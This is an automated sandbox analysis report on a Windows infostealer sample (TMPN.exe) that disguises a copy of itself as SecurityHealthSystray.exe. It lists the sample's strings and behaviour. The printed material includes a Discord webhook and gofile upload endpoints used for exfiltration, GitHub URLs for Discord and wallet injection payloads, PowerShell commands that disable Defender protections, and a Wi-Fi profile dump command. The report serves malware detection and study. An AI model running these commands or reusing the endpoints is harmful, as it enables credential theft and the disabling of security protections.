Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 02:18:28 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=ce8c3e3a699a11ef885c861c87208c5b; Expires=Sun, 02-Sep-2029 02:18:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1725329909x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zoDZnNrvKQU3FKHqkiZyf8QxUKCBYZn9HbypJ2KuWGjEpHv2GG%2B%2Ba1j7ToXhtiJDC6INnug2%2FCEPRJo47kHAX%2BRA8sMiIqqTaJjHsV08Y1%2FXGt32zunfy56fTJPAd0FKMA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=ce8c3e3a699a11ef885c861c87208c5be0709388e457b6edfba9d0d0a95cfdc8459dc91a9723948986eaf18ae2548e31; Expires=Sun, 02-Sep-2029 02:18:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Sep 2024 02:18:28 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=cef382f2699a11efa2c86208c9432e89; Expires=Sun, 02-Sep-2029 02:18:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Laxstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1725329910x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cEpoD2a3bnS8S0j1b9RlhsBmI7HU4JD1PoJyHiUwrE368H%2B4LbFt5yfpLlQQX09ymwdfLz8yz6s5tcmEoRCh0fknhvIYmyfpD1FzD%2BzAcuNOIyeUHztHLu71841qDa43ng%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: __sdcfduid=cef382f2699a11efa2c86208c9432e89087cfdf58b0aad585043413866e0be8f63226f7ae3001b5d0b1773448fa2a367; Expires=Sun, 02-Sep-2029 02:18:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax

Source: powershell.exe, 0000000D.00000002.2342891865.00000276BF300000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000000D.00000002.2342891865.00000276BF300000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000010.00000002.2372692651.000002147CFBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: TMPN.exe, SecurityHealthSystray.exe.0.dr	String found in binary or memory: http://ip-api.com/json
Source: powershell.exe, 00000010.00000002.2378348806.000002147D16D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.a.0/sTy
Source: powershell.exe, 00000010.00000002.2378348806.000002147D16D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobe.hotosh
Source: powershell.exe, 0000000D.00000002.2315610892.00000276B6D6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2364137931.000002147501F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2281611258.0000021466915000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2364137931.0000021475161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000010.00000002.2281611258.00000214668BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000D.00000002.2263957756.00000276A6F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 0000000D.00000002.2263957756.00000276A6D01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2281611258.0000021464FB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000D.00000002.2263957756.00000276A6F28000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000010.00000002.2281611258.0000021466715000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000010.00000002.2281611258.00000214668BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000D.00000002.2351115199.00000276BF3BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co~
Source: TMPN.exe, 00000000.00000002.4583301658.000000C0001B8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.c
Source: powershell.exe, 0000000D.00000002.2263957756.00000276A6D01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2281611258.0000021464FB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: TMPN.exe, SecurityHealthSystray.exe.0.dr	String found in binary or memory: https://api.gofile.io/getServerhttps://%s.gofile.io/uploadFilesql:
Source: TMPN.exe, SecurityHealthSystray.exe.0.dr	String found in binary or memory: https://api.ipify.org/-DisableIOAVProtection-DisableScriptScanning%s
Source: TMPN.exe, 00000000.00000002.4583301658.000000C000166000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://avatars.githubusercontent.com/u/145487845?v=4
Source: TMPN.exe, SecurityHealthSystray.exe.0.dr	String found in binary or memory: https://avatars.githubusercontent.com/u/145487845?v=4sqlite:
Source: TMPN.exe, 00000000.00000002.4583301658.000000C00012A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: powershell.exe, 00000010.00000002.2364137931.0000021475161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000010.00000002.2364137931.0000021475161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000010.00000002.2364137931.0000021475161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: SecurityHealthSystray.exe.0.dr	String found in binary or memory: https://discord.com/api/v9/users/
Source: powershell.exe, 00000010.00000002.2281611258.00000214668BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: TMPN.exe, SecurityHealthSystray.exe.0.dr	String found in binary or memory: https://github.com/hackirby/wallets-injection/raw/main/atomic.asarhttps://github.com/hackirby/wallet
Source: powershell.exe, 00000010.00000002.2281611258.0000021465BE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: TMPN.exe, 00000000.00000002.4583301658.000000C0001B8000.00000004.00001000.00020000.00000000.sdmp, TMPN.exe, 00000000.00000002.4583301658.000000C000166000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://i.ibb.co/GFZ2tHJ/shakabaiano-1674282487.jpg
Source: TMPN.exe, SecurityHealthSystray.exe.0.dr	String found in binary or memory: https://i.ibb.co/GFZ2tHJ/shakabaiano-1674282487.jpgJSON
Source: powershell.exe, 0000000D.00000002.2315610892.00000276B6D6E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2364137931.000002147501F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2281611258.0000021466915000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2364137931.0000021475161000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000010.00000002.2281611258.0000021466715000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000010.00000002.2281611258.0000021466715000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: TMPN.exe, SecurityHealthSystray.exe.0.dr	String found in binary or memory: https://ptb.discord.com/api/webhooks/1277694857338687561/FxXidvF_Xcdm1mFBnfMwjGWhByymrClV-px0CZhfTr9
Source: TMPN.exe, SecurityHealthSystray.exe.0.dr	String found in binary or memory: https://raw.githubusercontent.com/hackirby/discord-injection/main/injection.js1157920892103562487626
Source: TMPN.exe, 00000000.00000002.4597960184.0000028D6F587000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: TMPN.exe, 00000000.00000002.4583301658.000000C0001B8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefox
Source: TMPN.exe, 00000000.00000002.4597960184.0000028D6F587000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: TMPN.exe, 00000000.00000002.4583301658.000000C0001B8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.aliexpress.com/
Source: TMPN.exe, 00000000.00000002.4583301658.000000C0001B8000.00000004.00001000.00020000.00000000.sdmp, TMPN.exe, 00000000.00000002.4583301658.000000C00012A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/
Source: TMPN.exe, 00000000.00000002.4583301658.000000C0001B8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.de/
Source: TMPN.exe, 00000000.00000002.4583301658.000000C00012A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.baidu.com/
Source: TMPN.exe, 00000000.00000002.4583301658.000000C00012A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.co.uk/
Source: TMPN.exe, 00000000.00000002.4583301658.000000C0001B8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.ebay.de/
Source: TMPN.exe, 00000000.00000002.4583301658.000000C00012A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: TMPN.exe, 00000000.00000002.4597960184.0000028D6F587000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: TMPN.exe, 00000000.00000002.4597960184.0000028D6F587000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: TMPN.exe, 00000000.00000002.4597960184.0000028D6F587000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: TMPN.exe, 00000000.00000002.4583301658.000000C0001B8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.olx.pl/
Source: TMPN.exe, 00000000.00000002.4583301658.000000C0001B8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: TMPN.exe, 00000000.00000002.4583301658.000000C0001B8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.wykop.pl/

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Spam, unwanted Advertisements and Ransom Demands

Modifies the hosts file

Source: C:\Users\user\Desktop\TMPN.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

System Summary

Very long command line found

Source: C:\Users\user\Desktop\TMPN.exe	Process created: Commandline size = 3614
Source: C:\Users\user\Desktop\TMPN.exe	Process created: Commandline size = 3614			Jump to behavior

Source: C:\Users\user\Desktop\TMPN.exe

Process Stats: CPU usage > 49%

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFD34798955	13_2_00007FFD34798955
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFD347985BD	13_2_00007FFD347985BD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFD3479BEFB	13_2_00007FFD3479BEFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFD34798AF2	13_2_00007FFD34798AF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFD3479A7F2	13_2_00007FFD3479A7F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFD34795FF2	13_2_00007FFD34795FF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFD34795B71	13_2_00007FFD34795B71
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_00007FFD34796FA5	13_2_00007FFD34796FA5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FFD347A3AFB	16_2_00007FFD347A3AFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FFD347A2A2D	16_2_00007FFD347A2A2D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FFD347A264D	16_2_00007FFD347A264D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FFD347A39B8	16_2_00007FFD347A39B8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 16_2_00007FFD348717D9	16_2_00007FFD348717D9

Source: SecurityHealthSystray.exe.0.dr	Static PE information: Number of sections : 15 > 10
Source: TMPN.exe	Static PE information: Number of sections : 15 > 10

Source: TMPN.exe	Static PE information: Section: /19 ZLIB complexity 1.0001085069444444
Source: TMPN.exe	Static PE information: Section: /32 ZLIB complexity 0.9969879518072289
Source: TMPN.exe	Static PE information: Section: /65 ZLIB complexity 0.9996628978609232
Source: TMPN.exe	Static PE information: Section: /78 ZLIB complexity 0.9926648086376404
Source: SecurityHealthSystray.exe.0.dr	Static PE information: Section: /19 ZLIB complexity 1.0001085069444444
Source: SecurityHealthSystray.exe.0.dr	Static PE information: Section: /32 ZLIB complexity 0.9969879518072289
Source: SecurityHealthSystray.exe.0.dr	Static PE information: Section: /65 ZLIB complexity 0.9996628978609232
Source: SecurityHealthSystray.exe.0.dr	Static PE information: Section: /78 ZLIB complexity 0.9926648086376404

Source: classification engine

Classification label: mal100.troj.adwa.spyw.expl.evad.winEXE@38/24@4/3

Source: C:\Users\user\Desktop\TMPN.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4412:120:WilError_03
Source: C:\Users\user\Desktop\TMPN.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\3575651c-bb47-448e-a514-22865732bbc
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3700:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4592:120:WilError_03

Source: C:\Users\user\Desktop\TMPN.exe

File created: C:\Users\user\AppData\Local\Temp\browsers-temp

Jump to behavior

Source: C:\Users\user\Desktop\TMPN.exe	File opened: C:\Windows\system32\0e3fb953ef5ac91e1bf059b835ed4d30961acb5aa058909edd8ad53f42074325AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe	File opened: C:\Windows\system32\f28ffa084a7cbd831027df45df51bc568495ce58b931139c1e0e358c17f25102AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe	File opened: C:\Windows\system32\4191ff1d39cee90f565bfb059f798df62e51e4d25e639ce936bfa71601855cfbAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Source: TMPN.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\wbem\WMIC.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM WIN32_PROCESSOR

Source: C:\Users\user\Desktop\TMPN.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\TMPN.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: TMPN.exe, 00000000.00000002.4580262694.0000000000705000.00000002.00000001.01000000.00000003.sdmp, SecurityHealthSystray.exe, 00000011.00000002.2255354839.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, SecurityHealthSystray.exe, 00000018.00000000.2330525795.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, SecurityHealthSystray.exe.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: TMPN.exe, 00000000.00000002.4580262694.0000000000705000.00000002.00000001.01000000.00000003.sdmp, SecurityHealthSystray.exe, 00000011.00000002.2255354839.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, SecurityHealthSystray.exe, 00000018.00000000.2330525795.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, SecurityHealthSystray.exe.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: TMPN.exe, 00000000.00000002.4580262694.0000000000705000.00000002.00000001.01000000.00000003.sdmp, SecurityHealthSystray.exe, 00000011.00000002.2255354839.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, SecurityHealthSystray.exe, 00000018.00000000.2330525795.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, SecurityHealthSystray.exe.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: TMPN.exe, 00000000.00000002.4595205801.0000028D6DAB3000.00000004.00001000.00020000.00000000.sdmp, TMPN.exe, 00000000.00000002.4596406359.0000028D6DC10000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: TMPN.exe, 00000000.00000002.4580262694.0000000000705000.00000002.00000001.01000000.00000003.sdmp, SecurityHealthSystray.exe, 00000011.00000002.2255354839.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, SecurityHealthSystray.exe, 00000018.00000000.2330525795.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, SecurityHealthSystray.exe.0.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: TMPN.exe	ReversingLabs: Detection: 68%
Source: TMPN.exe	Virustotal: Detection: 70%

Source: TMPN.exe

String found in binary or memory: C:/Program Files/Go/src/net/addrselect.go

Source: C:\Users\user\Desktop\TMPN.exe

File read: C:\Users\user\Desktop\TMPN.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\TMPN.exe "C:\Users\user\Desktop\TMPN.exe"
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\Desktop\TMPN.exe
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\Desktop\TMPN.exe
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic cpu get Name
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get UUID
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\Desktop\TMPN.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlA